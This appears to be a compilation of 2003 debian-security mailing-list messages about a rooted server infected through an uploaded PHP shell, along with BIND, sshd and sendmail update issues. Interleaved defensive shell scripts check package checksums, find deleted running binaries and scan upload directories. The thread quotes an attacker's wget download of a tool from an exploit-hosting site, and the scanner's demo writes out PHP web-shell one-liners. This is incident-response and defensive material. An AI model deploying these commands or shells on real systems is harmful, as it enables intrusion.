Debian Security Advisory DSA 386-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
September 18th, 2003
Debian Security Advisory DSA 387-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Matt Zimmerman
September 18th, 2003
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable
Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel [EMAIL PROTECTED] wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on
Ralf Dreibrodt wrote:
Hi,
Markus Schabel wrote:
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that
Back up /etc and any other data you have, and you can reference your configuration
files later during your re-install.
At this point, re-installation is a must. Never delude yourself into thinking you can
'recover' from being rooted. Sure, you might be able to do so after a lot of effort/etc,
In all fairness, if this issue is in regards to the Verisign cluster
fsck I don't think this has any place in Sendmail personally but rather
in getting Verisign to un-fsck the problem and/or fix DNS servers not to
respond in that manner as to allow that to happen...
Regards,
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
Christian
- Original Message -
From: Josh Carroll [EMAIL PROTECTED]
To: debian-security@lists.debian.org
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
Wed, 2003-09-17 at 18:12, James Miller wrote:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to negate Verisign's recent shenanigans?
Well, it's not only a patch, it's part of bind upstream
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
Wed, 2003-09-17 at 18:12, James Miller wrote:
Will the package maintainers of BIND be integrating the patches from
ISC-BIND to
On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:
rndc stops working for me. Anybody else seen this?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused
(yes, yes, replying to meself...)
Ok: reason: named now runs as root instead of
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
Have you checked the documentation that comes along with the update?
[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn there's a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 11:21]:
On Thursday 18 September 2003 11:01, Lukas Ruf wrote:
Adrian von Bidder [EMAIL PROTECTED] [2003-09-18 10:48]:
rndc stops working for me. Anybody else seen this?
have you checked the documentation
maximilian attems wrote:
On Thu, 18 Sep 2003, Christian Storch wrote:
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]
in /etc/.rpn there's a .bash_history with the following content:
id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292
Hi list,
I ran an update of ssh to 3.6.1p2-8 due to the recent errors in OpenSSH
on a system with remote access only.
Afterwards I noticed that the version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
wget www.slacks.hpg.com.br/bin/dos
That directory www.slacks.hpg.com.br/bin/ also contains some
'interesting' files :-) Some exploits, rootkits etc.
Jan
hi!
* Philipp Hartmann [EMAIL PROTECTED] [2003-09-18 12:35]:
Afterwards I noticed, that the Version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was (and had to be) still
established. The top
In article [EMAIL PROTECTED] you wrote:
Does anyone know a more comfortable way to replace an sshd on a remotely
administered box?
If I kill the top-level listening sshd (you can extract its pid by running
netstat -tpln | grep :22 as root) my ssh session is not dropped, and I can
restart a new
The problem is starting before
id
mkdir /etc/.rpn
...
you should think about everything that's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc.
Hi again,
On Thu, 2003-09-18 at 12:32, Philipp Hartmann wrote:
Afterwards I noticed that the version which sshd reports was still
the old one. /etc/init.d/ssh restart seemed to have no effect.
Presumably caused by my ssh connection, which was (and had to be) still
established. The top
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's a chance that the server got hacked, I'm not
interested in giving him other passwords. Copied from the other server
via scp.
scp from the clean system into the dirty one. This
Phillip Hofmeister wrote:
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
scp goodserver:/bin/gzip /bin/gzip
NO! Since there's a chance that the server got hacked, I'm not
interested in giving him other passwords. Copied from the other server
via scp.
scp from the clean system
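The advice in the two messages above is to push a known-good gzip from the clean host to the suspect one and never to pull from the suspect host, because a compromised box must not be handed credentials for a clean one. Before trusting any binary on that box at all, the check a practitioner wants is whether the files on disk still match what dpkg installed. The following is an added example, not code from the thread or from Debian: it compares files against a dpkg-style md5sums list (the format of /var/lib/dpkg/info/<package>.md5sums), the way the debsums tool does, run here against a constructed directory tree with one overwritten and one deleted file. The directory layout and file contents are made up for the demo.

```shell
#!/bin/sh
# Added example (not from the thread or from Debian): verify files on disk
# against the checksums dpkg recorded at install time, the way debsums does.
# ROOT is the filesystem to check; MD5FILE is a dpkg md5sums list, one
# "<md5>  <path relative to />" per line, as in /var/lib/dpkg/info/gzip.md5sums.
#
# Caveat: on a rooted host, sh, md5sum and the md5sums lists themselves may be
# trojaned, so run this from clean boot media against the mounted disk.

# check_md5sums ROOT MD5FILE
# Prints "MODIFIED <path>" or "MISSING <path>" per problem found.
# Returns 0 if every listed file matches, 1 otherwise.
check_md5sums() {
    root=$1
    md5file=$2
    status=0
    while read -r expected relpath; do
        [ -n "$relpath" ] || continue            # skip blank lines
        file="$root/$relpath"
        if [ ! -f "$file" ]; then
            echo "MISSING $relpath"
            status=1
            continue
        fi
        actual=$(md5sum "$file" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "MODIFIED $relpath"
            status=1
        fi
    done < "$md5file"
    return $status
}

# Constructed demo tree (not a real Debian install): checksums are recorded
# for three files, then gzip is overwritten and the copyright file removed.
make_demo() {
    demo=$(mktemp -d)
    mkdir -p "$demo/bin" "$demo/usr/share/doc/gzip"
    printf 'original gzip\n'   > "$demo/bin/gzip"
    printf 'original gunzip\n' > "$demo/bin/gunzip"
    printf 'copyright\n'       > "$demo/usr/share/doc/gzip/copyright"
    # dpkg stores paths relative to / without a leading slash
    ( cd "$demo" && md5sum bin/gzip bin/gunzip usr/share/doc/gzip/copyright ) \
        > "$demo/gzip.md5sums"
    printf 'infected gzip\n' > "$demo/bin/gzip"      # simulate a trojaned binary
    rm "$demo/usr/share/doc/gzip/copyright"          # simulate a deleted file
    echo "$demo"
}

# Stand-alone run: sh this_script.sh demo
if [ "${1:-}" = "demo" ]; then
    d=$(make_demo)
    check_md5sums "$d" "$d/gzip.md5sums"
fi
```

On a real system the loop is run once per /var/lib/dpkg/info/*.md5sums with ROOT set to the mount point of the suspect disk; a MODIFIED line for a package-owned binary that no update touched is the infected-gzip symptom from the start of this thread, and a clean result still says nothing about files dpkg never installed (rootkit drops in /etc/.rpn, for instance).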
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
id
mkdir /etc/.rpn
...
you should think about all what's listening on a port:
-
On 18 Sep 2003 at 15:02, Markus Schabel wrote:
Christian Storch wrote:
The problem is starting before
I think all the things before phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.
[...]
- known
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:
in the directory /var/www/cncmap/www/upload/renegade there are the
following files:
- backhole.pl
- e.c (Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86)
- rem.php (phpRemoteView)
so we got
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:
Christian Storch wrote:
- security updates all up to date?
the same state as DSA announcements
Including your kernel?
- known unclosed security hole?
It seems that it was possible to upload and execute .php files somewhere
- perl without tainting checks in cgi-bin?
What exactly do you mean? How can I do/check that?
Use '#!/usr/local/bin/perl -T' at the beginning of a Perl CGI.
Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.
Christian
hi,
I want to set up postfix with SSL.
On the Internet I found only tutorials for postfix v2.0.
Stable uses postfix v1.1 and I couldn't find any information about postfix
1.1 and SSL.
Thanks for the help,
Konstantin
On Wednesday, 17 September 2003 21:29, Markus Schabel wrote:
Hello!
I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
I'm thinking about a hardware problem.
Maybe the hard drive is failing (get the output of dmesg) or a very big
RAM problem that corrupts files on the hard drive.
By the sound of things, this is starting to sound more like
Diego Brouard writes:
As you've seen, you have been cracked by a worm called
RST.b.
In a few words, it infects executable files in /bin and in the current directory
from which you are executing an already infected binary. You were infected
because of a PHP bug and the ptrace bug.
Might be a
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server
www.slacks.hpg.ig.com.br:
[...]
www.slacks.hpg.ig.com.br/bin/rh Infection: Unix/Osf.A
This is an
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too many errors which can happen, if we
should add some kind of post-update stale-executable
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
In article [EMAIL PROTECTED] you wrote:
I found the problem: The file /var/run/sshd.pid was missing.
Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too many errors
In article [EMAIL PROTECTED] you wrote:
Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it
after reading an excellent article by Brian Hatch on this precise issue.
Just a minor note, I think tiger is getting better and better, I really start
to love it. Especially since it
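The sshd that kept reporting its old version after the upgrade (the /var/run/sshd.pid thread above) and the 'check_finddeleted' Tiger check just mentioned are the same problem seen from two sides: a process still executing an image that has since been unlinked from disk. The following is an added example and is neither Tiger's code nor anything posted in the thread. On Linux, /proc/<pid>/exe links to the running image, and readlink reports the target with a " (deleted)" suffix once the file has been replaced; the function walks such a tree, here a constructed fake /proc rather than the real one, and reports the affected pids. The pids, paths and directory layout of the fake tree are made up for the demo.

```shell
#!/bin/sh
# Added example (not from the thread, and not Tiger's check_finddeleted):
# find processes still executing a file that has been deleted or replaced.
# On Linux, /proc/<pid>/exe is a symlink to the running image; after dpkg
# unlinks the old file, readlink reports the target with a " (deleted)"
# suffix. An sshd that still reports its pre-upgrade version shows up here.
#
# PROC_ROOT defaults to /proc; it is a parameter so the function can be run
# against a constructed tree, as in make_fake_proc below.

# find_deleted_exes [PROC_ROOT]
# Prints "<pid> <original path>" per affected process.
# Returns 1 if any were found (a failed check), 0 if none.
find_deleted_exes() {
    proc=${1:-/proc}
    found=0
    for exe in "$proc"/[0-9]*/exe; do
        # kernel threads have no exe link; other users' links need root
        [ -L "$exe" ] || continue
        target=$(readlink "$exe" 2>/dev/null) || continue
        case $target in
            *" (deleted)")
                pid=${exe#"$proc"/}
                pid=${pid%/exe}
                echo "$pid ${target%" (deleted)"}"
                found=1
                ;;
        esac
    done
    return $found
}

# Constructed fake /proc (no real process state): pid 812 still runs an sshd
# image that was replaced on disk; pid 1 runs a file that is still present.
make_fake_proc() {
    fake=$(mktemp -d)
    mkdir -p "$fake/1" "$fake/812"
    ln -s /sbin/init "$fake/1/exe"
    ln -s "/usr/sbin/sshd (deleted)" "$fake/812/exe"
    echo "$fake"
}

# Stand-alone run: sh this_script.sh demo   (or without "demo" against /proc)
if [ "${1:-}" = "demo" ]; then
    find_deleted_exes "$(make_fake_proc)"
fi
```

Run it as root against the real /proc after an upgrade; every pid it lists is still executing pre-upgrade code no matter what the package database says. As noted earlier in the thread for sshd, killing the listening parent (the pid netstat -tpln shows on :22) does not drop established sessions, so the stale daemon can be killed and the new one started from inside the same ssh session.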
rm -rf phpshell.php
^__^
was this the exploited hole?
I think so. In fact, the problem is that it got there...
probably uploaded somehow...
an upload form, some web script maybe?
check php permissions I'd say.
where was enr php-file located? do you know?
good luck, Jst.
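What the thread keeps pointing at (phpshell.php, rem.php, an upload directory under /var/www where .php files could land and be executed) is worth checking for on any host with a web-writable directory. The following is an added example, not from the thread: it walks an upload directory and flags files that a PHP-enabled Apache would hand to the interpreter, either by extension (including double extensions such as shell.php.jpg, which mod_mime passes to PHP when the extension is registered with AddHandler) or by content (a PHP open tag inside a supposed image). The extension list, the demo directory and the demo file contents are assumptions for the example.

```shell
#!/bin/sh
# Added example (not from the thread): scan a web-writable upload directory
# for files a PHP-enabled Apache would execute, or that smuggle PHP code
# under another extension. Two checks per file:
#   PHP-EXT  name carries a PHP extension anywhere after the first dot
#            (rem.php, but also shell.php.jpg, which mod_mime hands to PHP
#            when the extension is registered with AddHandler)
#   PHP-TAG  content contains a PHP open tag, whatever the name says
# The extension list is an assumption about a typical Apache+PHP setup;
# match it to the AddType/AddHandler lines of the server under review.

# scan_uploads DIR
# Prints "<reason> <path>" per flagged file, sorted by path.
# Returns 0 if nothing was flagged, 1 otherwise.
scan_uploads() {
    dir=$1
    hits=$(find "$dir" -type f | sort | while IFS= read -r f; do
        case $f in
            *.php|*.php3|*.php4|*.phtml|*.php.*|*.phtml.*)
                echo "PHP-EXT $f"
                continue
                ;;
        esac
        # grep -q returns 0 on the first match; binary "images" are fine
        if grep -q -e '<?php' -e '<?=' "$f" 2>/dev/null; then
            echo "PHP-TAG $f"
        fi
    done)
    [ -n "$hits" ] && printf '%s\n' "$hits"
    [ -z "$hits" ]
}

# Constructed upload directory (file names and contents are made up):
# two harmless files, an obvious web shell, PHP hidden inside a "GIF",
# and a double-extension upload.
make_demo_uploads() {
    up=$(mktemp -d)
    mkdir -p "$up/renegade"
    printf 'GIF89a\n' > "$up/avatar.gif"
    printf 'hello\n'  > "$up/notes.txt"
    printf '<?php system($_GET["cmd"]); ?>\n'      > "$up/renegade/rem.php"
    printf 'GIF89a\n<?php eval($_POST["x"]); ?>\n' > "$up/renegade/image.jpg"
    printf '<?php phpinfo(); ?>\n'                 > "$up/shell.php.jpg"
    echo "$up"
}

# Stand-alone run: sh this_script.sh demo   (or: scan_uploads /var/www/.../upload)
if [ "${1:-}" = "demo" ]; then
    scan_uploads "$(make_demo_uploads)"
fi
```

Scanning finds what is already there; the fix is configuration. Keep upload directories outside the document root, or switch the PHP engine off for them (php_admin_flag engine off inside a Directory block for mod_php), so that whatever an upload form writes is served as data rather than run.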
Hi all. I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable). I did the usual 'sudo apt-get update; sudo apt-get
upgrade' but wasn't seeing the new package.
A little bit of investigation showed the
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
Was there any particular reason that this newer fixed version has a
version number that makes it look older than the exploitable version?
Simple: it doesn't. The version in stable is 8.12.3-4, and the version on
On Fri, 19 Sep 2003, Matt Zimmerman wrote:
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
Was there any particular reason that this newer fixed version has a
version number that makes it look older than the exploitable version?
Simple: it doesn't. The version in stable